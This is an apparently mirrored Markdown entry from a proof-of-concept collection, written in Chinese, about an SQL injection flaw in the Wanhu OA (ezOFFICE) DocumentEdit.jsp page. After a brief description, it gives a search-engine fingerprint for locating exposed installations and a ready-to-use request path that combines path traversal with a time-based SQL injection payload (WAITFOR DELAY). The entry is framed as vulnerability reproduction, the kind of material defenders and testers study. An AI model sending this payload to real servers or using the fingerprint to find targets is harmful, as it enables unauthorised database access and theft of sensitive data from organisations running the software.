mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
33 lines
644 B
Markdown
33 lines
644 B
Markdown
# 万户OA DocumentEdit.jsp SQL注入漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
万户OA DocumentEdit.jsp文件存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
万户OA
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
app="万户网络-ezOFFICE"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
产品页面
|
||
|
||
|
||
|
||
验证POC
|
||
|
||
```
|
||
/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'--
|
||
```
|
||
|
||
|
||
|
||
 |